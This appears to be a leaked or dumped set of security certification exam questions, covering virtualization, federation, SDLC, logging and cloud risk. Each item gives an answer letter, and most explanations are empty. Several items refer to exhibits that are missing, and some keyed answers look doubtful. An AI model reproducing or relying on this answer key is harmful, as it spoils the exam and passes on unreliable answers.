QUESTION NO: 420 A security manager is concerned about performance and patch management, and, as a result, wants to implement a virtualization strategy to avoid potential future OS vulnerabilities in the host system. The IT manager wants a strategy that would provide the hypervisor with direct communications with the underlying physical hardware allowing the hardware resources to be paravirtualized and delivered to the guest machines. Which of the following recommendations from the server administrator BEST meets the IT and security managers' requirements? (Select TWO). A. Nested virtualized hypervisors B. Type 1 hypervisor C. Hosted hypervisor with a three layer software stack D. Type 2 hypervisor E. Bare metal hypervisor with a software stack of two layers

Answer: B,E Explanation:

QUESTION NO: 165 A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. A total outage period of four hours is permitted for servers. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify parameters for the maintenance work? (Select TWO). A. Managed security service B. Memorandum of understanding C. Quality of service D. Network service provider E. Operating level agreement

Answer: B,E Explanation: B: A memorandum of understanding (MOU) documents conditions and applied terms for outsourcing partner organizations that must share data and information resources. It must be signed by a re presentative from each organization that has the legal authority to sign and are typically secured, as they are considered confidential. E: An operating level agreement (O LA) defines the responsibilities of each partner's internal support group and what group and resources are used to meet the specified goal. It is used in conjunction with service level agreements (SLAs).

QUESTION NO: 206 An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should the company ensure is supported by the thirdparty? (Select TWO). A. LDAP/S B. SAML C. NTLM D. OAUTH E. Kerberos

Answer: B,E Explanation: If we're using Active Directory Federated Services, then we are using Active Directory Domain Services (AD DS). AD DS uses Kerberos for authentication. Active Directory Federated Services provides SAML services. AD FS is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet. When a user needs to access a Web application from one of its federation partners, the user's own organization is responsible for authenticating the user and providing identity information in the form of "claims" to the partner that hosts the Web application. The hosting partner uses its trust policy to map the incoming claims to claims that are understood by its Web application, which uses the claims to make authorization decisions.

QUESTION NO: 183 A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO). A. Perform penetration testing over the HR solution to identify technical vulnerabilities B. Perform a security risk assessment with recommended solutions to close off high-rated risks C. Secure code review of the HR solution to identify security gaps that could be exploited D. Perform access control testing to ensure that privileges have been configured correctly E. Determine if the information security standards have been complied with by the project

Answer: B,E Explanation: In this question, we are pushed for time to get the project completed. Therefore, we have to prioritize our security testing as we do not have time to fully test everything. One of the priorities from a security perspective should be to perform a security risk assessment with recommended solutions to close off high-rated risks. This is to test for the most potentially damaging risks and to remediate them. The other priority is to determine if the information security standards have been complied with by the project. Security of information/data is the most important aspect of security. Loss of data can be very damaging for a company in terms of liability and litigation.

QUESTION NO: 143 A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Each log below was collected from various security devices compiled from a report through the company's security information and event management server. Logs: Log 1: Feb 5 23:55:37.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.2.5.81 3 packets Log 2: HTTP://www.company.com/index.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Log 3: Security Error Alert Event ID 50: The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client Log 4: Encoder oe = new OracleEncoder (); String query = "Select user_id FROM user_data WHERE user_name = ' " + oe.encode ( req.getParameter("userID") ) + " ' and user_password = ' " + oe.encode ( req.getParameter("pwd") ) +" ' "; Which of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO). A. Log 1 B. Log 2 C. Log 3 D. Log 4 E. Buffer overflow F. ACL G. XSS H. SQL injection

Answer: B,E Explanation: Log 2 indicates that the security breach originated from an external source. And the vulnerability that can be associated with this security breach is a buffer overflow that happened when the amount of data written into the buffer exceeded the limit of that particular buffer.

QUESTION NO: 207 An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. Which of the following has been overlooked in securing the system? (Select TWO). A. The company's IDS signatures were not updated. B. The company's custom code was not patched. C. The patch caused the system to revert to http. D. The software patch was not cryptographically signed. E. The wrong version of the patch was used. F. Third-party plug-ins were not patched.

Answer: B,F Explanation: In this question, we have an extensible commercial software system. Extensibility is a software design principle defined as a system's ability to have new functionality extended, in which the system's internal structure and data flow are minimally or not affected, particularly that recompiling or changing the original source code is unnecessary when changing a system's behavior, either by the creator or other programmers. Extensible systems are typically modified either by custom code or third party plugins. In this question, the core application was updated/patched. However, the custom code and third-party plugins were not patched. Therefore, a security vulnerability remained with was exploited.

QUESTION NO: 144 Since the implementation of IPv6 on the company network, the security administrator has been unable to identify the users associated with certain devices utilizing IPv6 addresses, even when the devices are centrally managed. en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 ether f8:1e:af:ab:10:a3 inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5 inet 192.168.1.14 netmask 0xffffff00 broadcast 192.168.1.255 inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary nd6 options=1<PERFORMNUD> media: autoselect status: active Given this output, which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6 addresses in the future? (Select TWO). A. The devices use EUI-64 format B. The routers implement NDP C. The network implements 6to4 tunneling D. The router IPv6 advertisement has been disabled E. The administrator must disable IPv6 tunneling F. The administrator must disable the mobile IPv6 router flag G. The administrator must disable the IPv6 privacy extensions H. The administrator must disable DHCPv6 option code 1

Answer: B,G Explanation: IPv6 makes use of the Neighbor Discovery Protocol (NDP). Thus if your routers implement NDP you will be able to map users with IPv6 addresses. However to be able to positively map users with IPv6 addresses you will need to disable IPv6 privacy extensions.

QUESTION NO: 438 An administrator's company has recently had to reduce the number of Tier 3 help desk technicians available to support enterprise service requests. As a result, configuration standards have declined as administrators develop scripts to troubleshoot and fix customer issues. The administrator has observed that several default configurations have not been fixed through applied group policy or configured in the baseline. Which of the following are controls the administrator should recommend to the organization's security manager to prevent an authorized user from conducting internal reconnaissance on the organization's network? (Select THREE). A. Network file system B. Disable command execution C. Port security D. TLS E. Search engine reconnaissance F. NIDS G. BIOS security H. HIDS I. IdM

Answer: B,G,I Explanation:

QUESTION NO: 273 An administrator is notified that contract workers will be onsite assisting with a new project. The administrator wants each worker to be aware of the corporate policy pertaining to USB storage devices. Which of the following should each worker review and understand before beginning work? A. Interconnection Security Agreement B. Memorandum of Understanding C. Business Partnership Agreement D. Non-Disclosure Agreement

Answer: C Explanation:

QUESTION NO: 210 Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrative complexity on the proposal. Which of the following BEST describes the core concerns of the security architect? A. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. B. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical platforms for regular maintenance. C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. D. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings.

Answer: C Explanation: The hosting company (Company XYZ) is responsible for the data separation of customer data. If a malicious user gained access to a customer's sensitive data, the customer could sue the hosting company for damages. The result of such a lawsuit could be catastrophic for the hosting company in terms of compensation paid to the customer and loss of revenue due to the damaged reputation of the hosting company.

QUESTION NO: 246 A startup company offering software on demand has hired a security consultant to provide expertise on data security. The company's clients are concerned about data confidentiality. The security consultant must design an environment with data confidentiality as the top priority, over availability and integrity. Which of the following designs is BEST suited for this purpose? A. All of the company servers are virtualized in a highly available environment sharing common hardware and redundant virtual storage. Clients use terminal service access to the shared environment to access the virtualized applications. A secret key kept by the startup encrypts the application virtual memory and data store. B. All of the company servers are virtualized in a highly available environment sharing common hardware and redundant virtual storage. Clients use terminal service access to the shared environment and to access the virtualized applications. Each client has a common shared key, which encrypts the application virtual memory and data store. C. Each client is assigned a set of virtual hosts running shared hardware. Physical storage is partitioned into LUNS and assigned to each client. MPLS technology is used to segment and encrypt each of the client's networks. PKI based remote desktop with hardware tokens is used by the client to connect to the application. D. Each client is assigned a set of virtual hosts running shared hardware. Virtual storage is partitioned and assigned to each client. VLAN technology is used to segment each of the client's networks. PKI based remote desktop access is used by the client to connect to the application.

Answer: C Explanation:

QUESTION NO: 247 A financial institution wants to reduce the costs associated with managing and troubleshooting employees' desktops and applications, while keeping employees from copying data onto external storage. The Chief Information Officer (CIO) has asked the security team to evaluate four solutions submitted by the change management group. Which of the following BEST accomplishes this task? A. Implement desktop virtualization and encrypt all sensitive data at rest and in transit. B. Implement server virtualization and move the application from the desktop to the server. C. Implement VDI and disable hardware and storage mapping from the thin client. D. Move the critical applications to a private cloud and disable VPN and tunneling.

Answer: C Explanation:

QUESTION NO: 251 A security administrator is redesigning, and implementing a service-oriented architecture to replace an old, in-house software processing system, tied to a corporate sales website. After performing the business process analysis, the administrator decides the services need to operate in a dynamic fashion. The company has also been the victim of data injection attacks in the past and needs to build in mitigation features. Based on these requirements and past vulnerabilities, which of the following needs to be incorporated into the SOA? A. Point to point VPNs for all corporate intranet users. B. Cryptographic hashes of all data transferred between services. C. Service to service authentication for all workflows. D. Two-factor authentication and signed code

Answer: C Explanation:

QUESTION NO: 254 A security administrator is conducting network forensic analysis of a recent defacement of the company's secure web payment server (HTTPS). The server was compromised around the New Year's holiday when all the company employees were off. The company's network diagram is summarized below: The security administrator discovers that all the local web server logs have been deleted. Additionally, the Internal Firewall logs are intact but show no activity from the internal network to the web server farm during the holiday. Which of the following is true? A. The security administrator should review the IDS logs to determine the source of the attack and the attack vector used to compromise the web server. B. The security administrator must correlate the external firewall logs with the intrusion detection system logs to determine what specific attack led to the web server compromise. C. The security administrator must reconfigure the network and place the IDS between the SSL accelerator and the server farm to be able to determine the cause of future attacks. D. The security administrator must correlate logs from all the devices in the network diagram to determine what specific attack led to the web server compromise.

Answer: C Explanation:

QUESTION NO: 257 When attending the latest security conference, an information security administrator noticed only a few people carrying a laptop around. Most other attendees only carried their smartphones. Which of the following would impact the security of conference's resources? A. Wireless network security may need to be increased to decrease access of mobile devices. B. Physical security may need to be increased to deter or prevent theft of mobile devices. C. Network security may need to be increased by reducing the number of available physical network jacks. D. Wireless network security may need to be decreased to allow for increased access of mobile devices.

Answer: C Explanation:

QUESTION NO: 259 In order for a company to boost profits by implementing cost savings on non-core business activities, the IT manager has sought approval for the corporate email system to be hosted in the cloud. The compliance officer has been tasked with ensuring that data lifecycle issues are taken into account. Which of the following BEST covers the data lifecycle end-to-end? A. Creation and secure destruction of mail accounts, emails, and calendar items B. Information classification, vendor selection, and the RFP process C. Data provisioning, processing, in transit, at rest, and de-provisioning D. Securing virtual environments, appliances, and equipment that handle email

Answer: C Explanation:

QUESTION NO: 262 An architect has been engaged to write the security viewpoint of a new initiative. Which of the following BEST describes a repeatable process that can be used for establishing the security architecture? A. Inspect a previous architectural document. Based on the historical decisions made, consult the architectural control and pattern library within the organization and select the controls that appear to best fit this new architectural need. B. Implement controls based on the system needs. Perform a risk analysis of the system. For any remaining risks, perform continuous monitoring. C. Classify information types used within the system into levels of confidentiality, integrity, and availability. Determine minimum required security controls. Conduct a risk analysis. Decide on which security controls to implement. D. Perform a risk analysis of the system. Avoid extreme risks. Mitigate high risks. Transfer medium risks and accept low risks. Perform continuous monitoring to ensure that the system remains at an adequate security posture.

Answer: C Explanation:

QUESTION NO: 267 In an effort to reduce internal email administration costs, a company is determining whether to outsource its email to a managed service provider that provides email, spam, and malware protection. The security manager is asked to provide input regarding any security implications of this change. Which of the following BEST addresses risks associated with disclosure of intellectual property? A. Require the managed service provider to implement additional data separation. B. Require encrypted communications when accessing email. C. Enable data loss protection to minimize emailing PII and confidential data. D. Establish an acceptable use policy and incident response policy.

Answer: C Explanation:

QUESTION NO: 268 A company is preparing to upgrade its NIPS at five locations around the world. The three platforms the team plans to test, claims to have the most advanced features and lucrative pricing. Assuming all platforms meet the functionality requirements, which of the following methods should be used to select the BEST platform? A. Establish return on investment as the main criteria for selection. B. Run a cost/benefit analysis based on the data received from the RFP. C. Evaluate each platform based on the total cost of ownership. D. Develop a service level agreement to ensure the selected NIPS meets all performance requirements.

Answer: C Explanation:

QUESTION NO: 271 An administrator is reviewing logs and sees the following entry: Message: Access denied with code 403 (phase 2). Pattern match "\bunion\b.{1,100}?\bselect\b" at ARGS:$id. [data "union all select"] [severity "CRITICAL"] [tag "WEB_ATTACK"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] Action: Intercepted (phase 2) Apache-Handler: php5-script Which of the following attacks was being attempted? A. Session hijacking B. Cross-site script C. SQL injection D. Buffer overflow

Answer: C Explanation:

QUESTION NO: 272 A team is established to create a secure connection between software packages in order to list employee's remaining or unused benefits on their paycheck stubs. Which of the following business roles would be MOST effective on this team? A. Network Administrator, Database Administrator, Programmers B. Network Administrator, Emergency Response Team, Human Resources C. Finance Officer, Human Resources, Security Administrator D. Database Administrator, Facilities Manager, Physical Security Manager

Answer: C Explanation:

QUESTION NO: 276 If a technician must take an employee's workstation into custody in response to an investigation, which of the following can BEST reduce the likelihood of related legal issues? A. A formal letter from the company's president approving the seizure of the workstation. B. A formal training and awareness program on information security for all company managers. C. A screen displayed at log in that informs users of the employer's rights to seize, search, and monitor company devices. D. A printout of an activity log, showing that the employee has been spending substantial time on non-work related websites.

Answer: C Explanation:

QUESTION NO: 281 A Physical Security Manager is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. The Security Manager has several security guard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IP camera vendor does not have the ability to authenticate users at the camera level. Which of the following should the Security Manager suggest to BEST secure this environment? A. Create an IP camera network and deploy NIPS to prevent unauthorized access. B. Create an IP camera network and only allow SSL access to the cameras. C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras. D. Create an IP camera network and restrict access to cameras from a single management host.

Answer: C Explanation:

QUESTION NO: 290 The Chief Information Security Officer (CISO) of a small bank wants to embed a monthly testing regiment into the security management plan specifically for the development area. The CISO's requirements are that testing must have a low risk of impacting system stability, can be scripted, and is very thorough. The development team claims that this will lead to a higher degree of test script maintenance and that it would be preferable if the testing was outsourced to a third party. The CISO still maintains that third-party testing would not be as thorough as the third party lacks the introspection of the development team. Which of the following will satisfy the CISO requirements? A. Grey box testing performed by a major external consulting firm who have signed a NDA. B. Black box testing performed by a major external consulting firm who have signed a NDA. C. White box testing performed by the development and security assurance teams. D. Grey box testing performed by the development and security assurance teams.

Answer: C Explanation:

QUESTION NO: 300 A WAF without customization will protect the infrastructure from which of the following attack combinations? A. DDoS, DNS poisoning, Boink, Teardrop B. Reflective XSS, HTTP exhaustion, Teardrop C. SQL Injection, DOM based XSS, HTTP exhaustion D. SQL Injection, CSRF, Clickjacking

Answer: C Explanation:

QUESTION NO: 301 Company ABC is planning to outsource its Customer Relationship Management system (CRM) and marketing / leads management to Company XYZ. Which of the following is the MOST important to be considered before going ahead with the service? A. Internal auditors have approved the outsourcing arrangement. B. Penetration testing can be performed on the externally facing web system. C. Ensure there are security controls within the contract and the right to audit. D. A physical site audit is performed on Company XYZ's management / operation.

Answer: C Explanation:

QUESTION NO: 310 A large financial company has a team of security-focused architects and designers that contribute into broader IT architecture and design solutions. Concerns have been raised due to the security contributions having varying levels of quality and consistency. It has been agreed that a more formalized methodology is needed that can take business drivers, capabilities, baselines, and reusable patterns into account. Which of the following would BEST help to achieve these objectives? A. Construct a library of re-usable security patterns B. Construct a security control library C. Introduce an ESA framework D. Include SRTM in the SDLC

Answer: C Explanation:

QUESTION NO: 317 Which of the following provides the HIGHEST level of security for an integrated network providing services to authenticated corporate users? A. Point to point VPN tunnels for external users, three-factor authentication, a cold site, physical security guards, cloud based servers, and IPv6 networking. B. IPv6 networking, port security, full disk encryption, three-factor authentication, cloud based servers, and a cold site. C. Port security on switches, point to point VPN tunnels for user server connections, two-factor cryptographic authentication, physical locks, and a standby hot site. D. Port security on all switches, point to point VPN tunnels for user connections to servers, two-factor authentication, a sign-in roster, and a warm site.

Answer: C Explanation:

QUESTION NO: 324 The Chief Technology Officer (CTO) has decided that servers in the company datacenter should be virtualized to conserve physical space. The risk assurance officer is concerned that the project team in charge of virtualizing servers plans to co-mingle many guest operating systems with different security requirements to speed up the rollout and reduce the number of host operating systems or hypervisors required. Which of the following BEST describes the risk assurance officer's concerns? A. Co-mingling guest operating system with different security requirements allows guest OS privilege elevation to occur within the guest OS via shared memory allocation with the host OS. B. Co-mingling of guest operating systems with different security requirements increases the risk of data loss if the hypervisor fails. C. A weakly protected guest OS combined with a host OS exploit increases the chance of a successful VMEscape attack being executed, compromising the hypervisor and other guest OS. D. A weakly protected host OS will allow the hypervisor to become corrupted resulting in data throughput performance issues.

Answer: C Explanation:

QUESTION NO: 345 The organization has an IT driver on cloud computing to improve delivery times for IT solution provisioning. Separate to this initiative, a business case has been approved for replacing the existing banking platform for credit card processing with a newer offering. It is the security practitioner's responsibility to evaluate whether the new credit card processing platform can be hosted within a cloud environment. Which of the following BEST balances the security risk and IT drivers for cloud computing? A. A third-party cloud computing platform makes sense for new IT solutions. This should be endorsed going forward so as to align with the IT strategy. However, the security practitioner will need to ensure that the third-party cloud provider does regular penetration tests to ensure that all data is secure. B. Using a third-party cloud computing environment should be endorsed going forward. This aligns with the organization's strategic direction. It also helps to shift any risk and regulatory compliance concerns away from the company's internal IT department. The next step will be to evaluate each of the cloud computing vendors, so that a vendor can then be selected for hosting the new credit card processing platform. C. There may be regulatory restrictions with credit cards being processed out of country or processed by shared hosting providers. A private cloud within the company should be considered. An options paper should be created which outlines the risks, advantages, disadvantages of relevant choices and it should recommended a way forward. D. Cloud computing should rarely be considered an option for any processes that need to be significantly secured. The security practitioner needs to convince the stakeholders that the new platform can only be delivered internally on physical infrastructure.

Answer: C Explanation:

QUESTION NO: 346 The Universal Research Association has just been acquired by the Association of Medical Business Researchers. The new conglomerate has funds to upgrade or replace hardware as part of the acquisition, but cannot fund labor for major software projects. Which of the following will MOST likely result in some IT resources not being integrated? A. One of the companies may use an outdated VDI. B. Corporate websites may be optimized for different web browsers. C. Industry security standards and regulations may be in conflict. D. Data loss prevention standards in one company may be less stringent.

Answer: C Explanation:

QUESTION NO: 348 A company has implemented data retention policies and storage quotas in response to their legal department's requests and the SAN administrator's recommendation. The retention policy states all email data older than 90 days should be eliminated. As there are no technical controls in place, users have been instructed to stick to a storage quota of 500Mb of network storage and 200Mb of email storage. After being presented with an e-discovery request from an opposing legal council, the security administrator discovers that the user in the suit has 1Tb of files and 300Mb of email spanning over two years. Which of the following should the security administrator provide to opposing council? A. Delete files and email exceeding policy thresholds and turn over the remaining files and email. B. Delete email over the policy threshold and hand over the remaining emails and all of the files. C. Provide the 1Tb of files on the network and the 300Mb of email files regardless of age. D. Provide the first 200Mb of e-mail and the first 500Mb of files as per policy.

Answer: C Explanation:

QUESTION NO: 350 Ann, a Physical Security Manager, is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. Ann has several security guard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IP camera vendor does not have the ability to authenticate users at the camera level. Which of the following should Ann suggest to BEST secure this environment? A. Create an IP camera network and deploy NIPS to prevent unauthorized access. B. Create an IP camera network and only allow SSL access to the cameras. C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras. D. Create an IP camera network and restrict access to cameras from a single management host.

Answer: C Explanation:

QUESTION NO: 354 Company XYZ has had repeated vulnerability exploits of a critical nature released to the company's flagship product. The product is used by a number of large customers. At the Chief Information Security Officer's (CISO's) request, the product manager now has to budget for a team of security consultants to introduce major product security improvements. Here is a list of improvements in order of priority: 1. A noticeable improvement in security posture immediately. 2. Fundamental changes to resolve systemic issues as an ongoing process 3. Improvements should be strategic as opposed to tactical 4. Customer impact should be minimized Which of the following recommendations is BEST for the CISO to put forward to the product manager? A. Patch the known issues and provide the patch to customers. Make a company announcement to customers on the main website to reduce the perceived exposure of the application to alleviate customer concerns. Engage penetration testers and code reviewers to perform an in-depth review of the product. Based on the findings, address the defects and re-test the findings to ensure that any defects have been resolved. B. Patch the known issues and provide the patch to customers. Engage penetration testers and code reviewers to perform an in-depth review of the product. Based on the findings, address the defects and re-test the findings to ensure that the defects have been resolved. Introduce periodic code review and penetration testing of the product in question and consider including all relevant future projects going forward. C. Patch the known issues and provide the patch to customers. Implement an SSDLC / SDL overlay on top of the SDLC. Train architects, designers, developers, testers and operators on security importance and ensure that security-relevant activities are performed within each of the SDLC phases. Use the product as the primary focal point to close out issues and consider using the SSDLC / SDL overlay for all relevant future projects. D. Stop active support of the product. Bring forward end-of-life dates for the product so that it can be decommissioned. Start a new project to develop a replacement product and ensure that an SSDLC / SDL overlay on top of the SDLC is formed. Train BAs, architects, designers, developers, testers and operators on security importance and ensure that security-relevant activities are performed within each of the SDLC phases.

Answer: C Explanation:

QUESTION NO: 356 The lead systems architect on a software development project developed a design which is optimized for a distributed computing environment. The security architect assigned to the project has concerns about the integrity of the system, if it is deployed in a commercial cloud. Due to poor communication within the team, the security risks of the proposed design are not being given any attention. A network engineer on the project has a security background and is concerned about the overall success of the project. Which of the following is the BEST course of action for the network engineer to take? A. Address the security concerns through the network design and security controls. B. Implement mitigations to the security risks and address the poor communications on the team with the project manager. C. Document mitigations to the security concerns and facilitate a meeting between the architects and the project manager. D. Develop a proposal for an alternative architecture that does not leverage cloud computing and present it to the lead architect.

Answer: C Explanation:

QUESTION NO: 358 Continuous monitoring is a popular risk reduction technique in many large organizations with formal certification processes for IT projects. In order to implement continuous monitoring in an effective manner which of the following is correct? A. Only security related alerts should be forwarded to the network team for resolution. B. All logs must be centrally managed and access to the logs restricted only to data storage staff. C. Logging must be set appropriately and alerts delivered to security staff in a timely manner. D. Critical logs must be monitored hourly and adequate staff must be assigned to the network team.

Answer: C Explanation:

QUESTION NO: 364 A bank now has a major initiative to virtualize as many servers as possible, due to power and rack space capacity at both data centers. The bank has prioritized by virtualizing older servers first as the hardware is nearing end-of-life. The two initial migrations include: Which of the following should the security consultant recommend based on best practices? A. One data center should host virtualized web servers and the second data center should host the virtualized domain controllers. B. One virtual environment should be present at each data center, each housing a combination of the converted Windows 2000 and RHEL3 virtual machines. C. Each data center should contain one virtual environment for the web servers and another virtual environment for the domain controllers. D. Each data center should contain one virtual environment housing converted Windows 2000 virtual machines and converted RHEL3 virtual machines.

Answer: C Explanation:

QUESTION NO: 373 An audit at a popular on-line shopping site reveals that a flaw in the website allows customers to purchase goods at a discounted rate. To improve security the Chief Information Security Officer (CISO) has requested that the web based shopping cart application undergo testing to validate user input in both free form text fields and drop down boxes. Which of the following is the BEST combination of tools and / or methods to use? A. Blackbox testing and fingerprinting B. Code review and packet analyzer C. Fuzzer and HTTP interceptor D. Enumerator and vulnerability assessment

Answer: C Explanation:

QUESTION NO: 380 -- Exhibit - -- Exhibit -- Company management has indicated that instant messengers (IM) add to employee productivity. Management would like to implement an IM solution, but does not have a budget for the project. The security engineer creates a feature matrix to help decide the most secure product. Click on the Exhibit button. Which of the following would the security engineer MOST likely recommend based on the table? A. Product A B. Product B C. Product C D. Product D

Answer: C Explanation:

QUESTION NO: 381 An administrator attempts to install the package "named.9.3.6-12-x86_64.rpm" on a server. Even though the package was downloaded from the official repository, the server states the package cannot be installed because no GPG key is found. Which of the following should the administrator perform to allow the program to be installed? A. Download the file from the program publisher's website. B. Generate RSA and DSA keys using GPG. C. Import the repository's public key. D. Run sha1sum and verify the hash.

Answer: C Explanation:

QUESTION NO: 386 Company XYZ recently acquired a manufacturing plant from Company ABC which uses a different manufacturing ICS platform. Company XYZ has strict ICS security regulations while Company ABC does not. Which of the following approaches would the network security administrator for Company XYZ MOST likely proceed with to integrate the new manufacturing plant? A. Conduct a network vulnerability assessment of acquired plant ICS platform and correct all identified flaws during integration. B. Convert the acquired plant ICS platform to the Company XYZ standard ICS platform solely to eliminate potential regulatory conflicts. C. Conduct a risk assessment of the acquired plant ICS platform and implement any necessary or required controls during integration. D. Require Company ABC to bring their ICS platform into regulatory compliance prior to integrating the new plant into Company XYZ's network.

Answer: C Explanation:

QUESTION NO: 389 A UNIX administrator notifies the storage administrator that extra LUNs can be seen on a UNIX server. The LUNs appear to be NTFS file systems. Which of the following MOST likely happened? A. The iSCSI initiator was not restarted. B. The NTFS LUNs are snapshots. C. The HBA allocation is wrong. D. The UNIX server is multipathed.

Answer: C Explanation:

QUESTION NO: 390 An organization has just released a new mobile application for its customers. The application has an inbuilt browser and native application to render content from existing websites and the organization's new web services gateway. All rendering of the content is performed on the mobile application. The application requires SSO between the application, the web services gateway and legacy UI. Which of the following controls MUST be implemented to securely enable SSO? A. A registration process is implemented to have a random number stored on the client. B. The identity is passed between the applications as a HTTP header over REST. C. Local storage of the authenticated token on the mobile application is secured. D. Attestation of the XACML payload to ensure that the client is authorized.

Answer: C Explanation:

QUESTION NO: 396 Part of the procedure for decommissioning a database server is to wipe all local disks, as well as SAN LUNs allocated to the server, even though the SAN itself is not being decommissioned. Which of the following is the reason for wiping the SAN LUNs? A. LUN masking will prevent the next server from accessing the LUNs. B. The data may be replicated to other sites that are not as secure. C. Data remnants remain on the LUN that could be read by other servers. D. The data is not encrypted during transport.

Answer: C Explanation:

QUESTION NO: 398 The security administrator is reviewing the business continuity plan which consists of virtual infrastructures at corporate headquarters and at the backup site. The administrator is concerned that the VLAN used to perform live migrations of virtual machines to the backup site is across the network provider's MPLS network. This is a concern due to which of the following? A. The hypervisor virtual switches only support Q-in-Q VLANS, not MPLS. This may cause live migrations to the backup site to fail. B. VLANs are not compatible with MPLS, which may cause intermittent failures while performing live migrations virtual machines during a disaster. C. Passwords are stored unencrypted in memory, which are then transported across the MPLS network. D. Transport encryption is being used during the live migration of virtual machines which will impact the performance of the MPLS network.

Answer: C Explanation:

QUESTION NO: 405 A university Chief Information Security Officer is analyzing various solutions for a new project involving the upgrade of the network infrastructure within the campus. The campus has several dorms (two-four person rooms) and administrative buildings. The network is currently setup to provide only two network ports in each dorm room and ten network ports per classroom. Only administrative buildings provide 2.4 GHz wireless coverage. The following three goals must be met after the new implementation: 1. Provide all users (including students in their dorms) connections to the Internet. 2. Provide IT department with the ability to make changes to the network environment to improve performance. 3. Provide high speed connections wherever possible all throughout campus including sporting event areas. Which of the following risk responses would MOST likely be used to reduce the risk of network outages and financial expenditures while still meeting each of the goals stated above? A. Avoid any risk of network outages by providing additional wired connections to each user and increasing the number of data ports throughout the campus. B. Transfer the risk of network outages by hiring a third party to survey, implement and manage a 5.0 GHz wireless network. C. Accept the risk of possible network outages and implement a WLAN solution to provide complete 5.0 GHz coverage in each building that can be managed centrally on campus. D. Mitigate the risk of network outages by implementing SOHO WiFi coverage throughout the dorms and upgrading only the administrative buildings to 5.0 GHz coverage using a one for one AP replacement.

Answer: C Explanation:

QUESTION NO: 407 A security engineer is troubleshooting a possible virus infection, which may have spread to multiple desktop computers within the organization. The company implements enterprise antivirus software on all desktops, but the enterprise antivirus server's logs show no sign of a virus infection. The border firewall logs show suspicious activity from multiple internal hosts trying to connect to the same external IP address. The security administrator decides to post the firewall logs to a security mailing list and receives confirmation from other security administrators that the firewall logs indicate internal hosts are compromised with a new variant of the Trojan.Ransomcrypt.G malware not yet detected by most antivirus software. Which of the following would have detected the malware infection sooner? A. The security administrator should consider deploying a signature-based intrusion detection system. B. The security administrator should consider deploying enterprise forensic analysis tools. C. The security administrator should consider installing a cloud augmented security service. D. The security administrator should consider establishing an incident response team.

Answer: C Explanation:

QUESTION NO: 409 A vulnerability research team has detected a new variant of a stealth Trojan that disables itself when it detects that it is running on a virtualized environment. The team decides to use dedicated hardware and local network to identify the Trojan's behavior and the remote DNS and IP addresses it connects to. Which of the following tools is BEST suited to identify the DNS and IP addresses the stealth Trojan communicates with after its payload is decrypted? A. HIDS B. Vulnerability scanner C. Packet analyzer D. Firewall logs E. Disassembler

Answer: C Explanation:

QUESTION NO: 414 The threat abatement program manager tasked the software engineer with identifying the fastest implementation of a hash function to protect passwords with the least number of collisions. Which of the following should the software engineer implement to best meet the requirements? A. hash = sha512(password + salt);for (k = 0; k < 4000; k++) {hash = sha512 (hash);} B. hash = md5(password + salt);for (k = 0; k < 5000; k++) {hash = md5 (hash);} C. hash = sha512(password + salt);for (k = 0; k < 3000; k++) {hash = sha512 (hash + password + salt);} D. hash1 = sha1(password + salt);hash = sha1 (hash1);

Answer: C Explanation:

QUESTION NO: 422 The audit department at a company requires proof of exploitation when conducting internal network penetration tests. Which of the following provides the MOST conclusive proof of compromise without further compromising the integrity of the system? A. Provide a list of grabbed service banners. B. Modify a file on the system and include the path in the test's report. C. Take a packet capture of the test activity. D. Add a new test user account on the system.

Answer: C Explanation:

QUESTION NO: 428 A security administrator is investigating the compromise of a SCADA network that is not physically connected to any other network. Which of the following is the MOST likely cause of the compromise? A. Outdated antivirus definitions B. Insecure wireless C. Infected USB device D. SQL injection

Answer: C Explanation:

QUESTION NO: 430 A court order has ruled that your company must surrender all the email sent and received by a certain employee for the past five years. After reviewing the backup systems, the IT administrator concludes that email backups are not kept that long. Which of the following policies MUST be reviewed to address future compliance? A. Tape backup policies B. Offsite backup policies C. Data retention policies D. Data loss prevention policies

Answer: C Explanation:

